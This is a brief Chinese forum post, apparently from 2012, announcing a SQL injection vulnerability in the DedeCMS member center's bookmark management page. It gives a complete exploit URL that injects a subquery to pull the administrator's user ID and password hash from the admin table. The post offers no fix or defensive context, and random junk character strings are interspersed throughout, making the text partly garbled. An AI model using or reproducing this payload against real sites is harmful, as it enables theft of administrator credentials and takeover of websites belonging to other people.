DedeCMS会员中心SQL注射漏洞
' ~8 A( D7 G2 C需要magic_quotes_gpc = Off
, J3 B4 B' Y9 e- q' T/ S会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.8 A& q! |; H9 r
) {: g9 n* S6 a5 c2 o' k+ t
DedeCMS会员中心书签管理SQL注射漏洞
& m8 s# K) A" |* w4 w成功利用该漏洞可获得管理员密码
) w! {6 n5 u1 W ~6 v9 m
) V* s; [( u/ }; \" g4 D会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
5 q0 f) u% T: M
8 C' [' l9 F; q$ ahttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r8 M7 K' u( M8 M' { l7 U
|
发表于 2012-12-31 09:21:18
收藏
分享
支持
反对
发表于 2013-1-10 01:33:59